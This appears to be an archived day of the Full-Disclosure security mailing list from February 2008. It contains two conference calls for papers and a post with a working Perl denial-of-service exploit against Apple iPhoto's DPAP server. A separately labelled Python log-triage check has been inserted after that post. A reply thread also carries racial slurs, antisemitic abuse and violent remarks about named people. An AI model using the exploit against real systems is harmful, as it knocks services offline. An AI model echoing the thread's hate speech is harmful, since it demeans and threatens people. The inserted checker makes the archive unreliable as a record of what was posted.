[Full-disclosure] Call for Papers: First IEEE International Workitorial on Steganography - "Vision of the Unseen"

2008-02-18 Thread wjs3

We are pleased to announce the First IEEE Workitorial on Vision of the
Unseen (WVU'08). http://www.liv.ic.unicamp.br/wvu/

This unique event will engage the Vision and Security Communities in this
challenging area. WVU'08 is a combined tutorial and a workshop exploring the 
many facets of vision and pattern recognition to 'see' what humans cannot. It 
will be held in conjunction with CVPR in Anchorage, Alaska on June 23rd, 2008.

We invite you to submit results on one of the 2 classes of papers: regular
and competition. Regular papers comprise brand new and unpublished results on
one or more of the following topics:

- Steganography and Steganalysis

- Forgery/manipulation detection

- Sensor fingerprinting

- Image authentication

- Information Hiding

- Algorithm fusion for the above topics

Competition papers comprise papers for the Unseen Challenge. Such papers
must explore the performance of previously published or new Steganalysis
algorithms on a challenge dataset (which we will provide).

All papers must follow the IEEE format style and have up to 6 pages, with
the option of purchasing up to 2 extra pages for $100 per page.

Finally, WVU'08 will present a Tutorial Session with the most recent
developments on the Vision of the Unseen.

Important Dates:

Regular papers
  + Submission: 3/20/08
  + Acceptance: 4/15/08
  + Camera Ready: 5/1/08

Competition papers
  + Submission: 4/10/08
  + Acceptance: 4/25/08
  + Camera Ready: 5/1/08



-Walter


--
Walter J. Scheirer
Graduate Student
Department of Computer Science
University of Colorado at Colorado Springs

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Apple iPhoto v4.0.3 DPAP Server Denial of Service Exploit

2008-02-18 Thread David Wharton
A little zero-day exploit in memory of Dude VanWinkle.

Apple iPhoto v4.0.3 DPAP (Digital Photo Access Protocol) Server Denial  
of Service Exploit.

Other versions may be vulnerable too; the current version should not  
be vulnerable.

The server process catches the exception, exits cleanly, but does not  
restart.

This exploits a previously undisclosed vulnerability.

-David Wharton

---

#!/usr/bin/perl
# crash the iPhoto DPAP (Digital Photo Access Protocol) Server on iPhoto 4.0.3
# technically the server exits cleanly but it does not restart

use IO::Socket::INET;

die "Usage $0 \n" unless ($ARGV[0]);

$| = 1;

if ($ARGV[1]) {
 $port = $ARGV[1];
} else {
 $port = 8770;
}

$socket=new IO::Socket::INET->new(PeerAddr=>$ARGV[0],
   PeerPort=>$port,
   Proto=>'tcp');

if ($socket == NULL) {
die "Cannot connect to $ARGV[0] on port $port\n";
}


$malformed_data = "AAA";
#$malformed_data = "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n";
$count = 0;

$msg="GET dpap://$malformed_data HTTP/1.1\r\n\r\n";
print "Sending message:\n$msg\n";
$socket->send($msg);
$socket->close();
sleep(1);
$cont = 1;

# this loop is unnecessary but who cares
while ($cont && $count < 11) {
 $socket2 = new IO::Socket::INET->new(PeerAddr=>$ARGV[0],
   PeerPort=>$port, Proto=>'tcp');
 if ($socket2 == NULL) {
  $cont = 0;
  print "crash\n";
 } else {
  print ".";
  # next line not necessary but does the job too
  $malformed_data = $malformed_data.$malformed_data;
  $msg="GET dpap://$malformed_data HTTP/1.1\r\n\r\n";
  $socket2->send($msg);
  $count++;
  $socket2->close();
  sleep(1);
 }
}

if ($count < 10) {
 print "iPhotoDPAPServer on $ARGV[0] has been pwn3d\n";
} else {
 print "Unable to crash iPhotoDPAPServer on $ARGV[0]\n";
}
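
An added example, not part of David Wharton's post or of any Apple code: a Python triage check for request lines logged in front of a DPAP listener, flagging the kinds of request target the script above sends (a dpap:// target with no resource path, an over-long authority, or a stray "%"). The (source, line) record shape, the sample addresses and the /server-info path are assumptions; the post does not say which property triggers the fault, so the rules are generic well-formedness checks.

```python
import re

MAX_HOST_LEN = 253                                  # DNS name length limit
HOST_RE = re.compile(r"^[A-Za-z0-9.-]+$")           # IPv6 literals not handled
BAD_ESCAPE_RE = re.compile(r"%(?![0-9A-Fa-f]{2})")  # e.g. the script's "%n"

def triage_request_line(line):
    """Return the reasons a logged request line looks malformed ([] if none)."""
    parts = line.rstrip("\r\n").split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return ["not a METHOD TARGET VERSION request line"]
    target = parts[1]
    if not target.lower().startswith("dpap://"):
        return []  # origin-form target such as "/path": outside this check
    reasons = []
    if BAD_ESCAPE_RE.search(target):
        reasons.append("percent sign not followed by two hex digits")
    authority, slash, _path = target[len("dpap://"):].partition("/")
    host, _, port = authority.partition(":")
    if not host or len(host) > MAX_HOST_LEN or not HOST_RE.match(host):
        reasons.append("authority is not a plausible host name")
    if port and not port.isdigit():
        reasons.append("non-numeric port")
    if not slash:
        reasons.append("no resource path after the authority")
    return reasons

def flag_sources(log):
    """Count flagged requests per source address in (source, line) records."""
    counts = {}
    for source, line in log:
        if triage_request_line(line):
            counts[source] = counts.get(source, 0) + 1
    return counts

# Constructed sample records: documentation addresses, assumed normal path.
SAMPLE_LOG = [
    ("192.0.2.10", "GET dpap://photos.example:8770/server-info HTTP/1.1"),
    ("198.51.100.7", "GET dpap://AAA HTTP/1.1"),
    ("198.51.100.7", "GET dpap://" + "A" * 384 + " HTTP/1.1"),
    ("198.51.100.7", "GET dpap://%n%n%n%n HTTP/1.1"),
    ("192.0.2.10", "GET /server-info HTTP/1.1"),
]

if __name__ == "__main__":
    for source, line in SAMPLE_LOG:
        print(source, triage_request_line(line) or "ok")
```

Because the server exits without restarting, a flagged request followed by refused connections on the DPAP port (8770 in the script) is the pairing worth alerting on.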



[Full-disclosure] RUXCON 2008 CALL FOR PAPERS

2008-02-18 Thread cfp
RUXCON 2008 CALL FOR PAPERS

RuxCon would like to announce the call for papers for the fifth annual
RuxCon conference.

This year the conference will commence during the 29th/30th November.

As with previous years, RuxCon will be held at the University of
Technology, Sydney, Australia.

The deadline for submissions is the 31st of October.

* What is RuxCon?

  RuxCon strives to be Australia's most technical and interesting
  computer security conference. We're back for the fifth year
  and intend on bringing you another high quality conference.

  The conference is held over two days in a relaxed atmosphere,
  allowing attendees to enjoy themselves whilst expanding their
  knowledge of security.

  Live presentations and activities will cover a full range of
  defensive and offensive security topics, varying from unpublished
  research to required reading for the public security community.

  For more information, please visit http://www.ruxcon.org.au

* Presentation Information

  Presentations are set to run for 50 minutes, and will be of a formal
  nature, with slides and a speech.

* Presentation Submissions

  RuxCon would like to invite people who are interested in security to
  submit a presentation.

  Topics of interest include, but are not limited to:

o Code analysis
o Exploitation techniques
o Network scanning and analysis
o Cryptography
o Malware Analysis
o Reverse engineering
o Forensics and Anti-forensics
o Social engineering
o Web application security
o Database security
o Legal aspects of computer security and surrounding issues
o Law enforcement activities
o Telecommunications security (mobile, GSM, VOIP, etc)

  Submissions should thoroughly outline your desired presentation or
  workshop subject. Accompanying your submission should be the slides
  you intend to use or a detailed paper explaining your subject.

  If you have any enquiries about submissions, or would like to make a
  submission, please send an e-mail to presentations @ ruxcon dot org
  dot au

  The deadline for submissions is the 31st of October.

  If approved we will additionally require:

i.  A brief personal biography (between 2-5 paragraphs in
length), including: skill set, experience, and credentials.

ii. A description of your presentation or workshop (between 2-5
paragraphs in length).

* Contact Details

Presentation Submissions:  presentations @ ruxcon dot org dot au
General Enquiries: staff @ ruxcon dot org dot au



Re: [Full-disclosure] let's name something after dude vanwinkle

2008-02-18 Thread Darkie Duck
Hmm they both niggers?

> Date: Sat, 16 Feb 2008 12:01:49 -0500> To: full-disclosure@lists.grok.org.uk; 
> [EMAIL PROTECTED]> From: [EMAIL PROTECTED]> Subject: Re: [Full-disclosure] 
> let's name something after dude vanwinkle> > Dear Andjew,> > 
> c35312fb3a7e05b7a44db2326bd29040> > This hash is proof that Gobbles and 
> n3td3v are one in the same. I > will reveal this information as soon it is 
> cleared for publication > by Dr. Neal Krawetz, with whom I have been 
> collaborating with for > some time now.> > As for your Anti-Semetic remarks, 
> they are not appreciated. Please > take your hatred for the Jews and other 
> sub-human cultures off list.> > J> > "The best political weapon is the weapon 
> of terror. Cruelty > commands respect. Men may hate us. But, we don't ask for 
> their > love; only for their fear." - Paul Schmehl> > _> > > _> > On Sat, 16 
> Feb 2008 10:33:15 -0500 Andrew A <[EMAIL PROTECTED]> > wrote:> >dear 
> mengele,> >> >n3td3v isn't gobbles. rocky is pretty sharp and hilarious. 
> n3td3v > >is only> >unintentionally funny.> >> >also why haven't you injected 
> bleach into the eyes of known > >talmudic piglet> >gadi evron?> >> >On Feb 
> 15, 2008 3:48 PM, Joey Mengele <[EMAIL PROTECTED]> > >wrote:> >> >> Dear 
> Gobbles,> >>> >> We can rename him 'Dude Van Bitchwrinkle'. Get it? That 
> means > >pussy> >> in American. LOLOLOL.> >>> >> J> >>> >> "I told you I was 
> hardcore" - Dude Van Bitchwrinkle> >>> >> On Fri, 15 Feb 2008 12:43:16 -0500 
> worried security> >> <[EMAIL PROTECTED]> wrote:> >> >i've been thinking about 
> this for a few days and i think > >something> >> >should be named after him 
> or a foundation or charity setup in > >his> >> >name.> >> >> >> >even a new 
> mailing list named after him or some good cause to > >come> >> >from his life 
> to keep his alias in circulation for future> >> >generations> >> >of security 
> folks to learn about him.> >> >> >> >i'm very disappointed he wasn't 
> mentioned on securityfocus but> >> >those> >> >folks are on the same downhill 
> spiral as yahoo inc anyway, so > >why> >> >should we care what securityfocus 
> are doing.> >> >> >> >its time to get brain storming on this, but i want him 
> to stay > >in> >> >memory long after we're gone..> >> >> >> >me and dude 
> vanwinkle weren't best o friends or best o enemies > >but> >> >i> >> >did 
> read his posts everyday and thought he was ok.> >> >> >> >i will leave it 
> upto the funsec crowd and gadi evron to > >organise> >> >and> >> >decide if 
> something and what should be named after him, i don't> >> >want> >> >to be 
> part of organising, i'm just throwing the suggestion out> >> >there> >> >for 
> the real decision makers to decide what the next step > >should> >> >be in> 
> >> >remembering the dude.> >> >> >> >i have a mailing list called n3td3v so 
> if i get killed there is> >> >something for me on the internet to keep my 
> name in > >circulation,> >> >its> >> >time there was something to remember 
> dude vanwinkle.> >> >> >> >i'll leave it upto the higher ups to decide if 
> this is a good > >or> >> >bad> >> >suggestion its not upto me to decide on 
> things like this.> >> >> >> >gadi evron is a born leader, so i give it to him 
> to lead this > >and> >> >decide on what should be setup or named after him.> 
> >> >> >> >and if nothing is setup and named after him, then i will do it> >> 
> >myself,> >> >because i think something should.> >> >> >> >so folks, get 
> brain storming and we can come up with the best> >> >tribute> >> >for to 
> remember the vanwinkle by.> >> >> >> >we don't want to name a worm after him 
> or anything like that,> >> >let's> >> >keep it lawful and whitehat lolz.> >> 
> >> >> >i will be montioring the conversation closely and if i think> >> 
> >something> >> >is wrong with what you are doing i will step in and make my > 
> >views> >> >clear on matters. but i think gadi evron is competent enough to> 
> >> >come> >> >up with a fitting tribute to name him after without me putting 
> > >my> >> >weight in. my weight however will always be available to step > 
> >in> >> >if i> >> >don't agree with whats going on. lolz.> >> >> >> >i don't 
> like gadi evron,however, he is the biggest person after > >me> >> >on> >> 
> >the mailing lists, so i elect him to do it. i am big in the> >> >security> 
> >> >community, bigger than evron, but i want him to do it cos i> >> 
> >decided.lolz.> >> >> >> >hackerz+security experts unite...to create 
> something for the > >dude.> >> >> >> 
> >___> >> >Full-Disclosure - We 
> believe in it.> >> >Charter: 
> http://lists.grok.org.uk/full-disclosure-charter.html> >>> >> --> >> Click to 
> begin your health care training online. Request info > >today.> >>> >> > 
> >http://tagline.hushmail.com/fc/Ioyw6h4fOHX3UcHC81m6VjoI7vOADgxa6xLs> 
> >uEkRfPg3qImz4GvWkg/> >> >Hosted and sponsored by Secunia - 
> http://secunia.com/> >>> >> ___> 
> >> Full-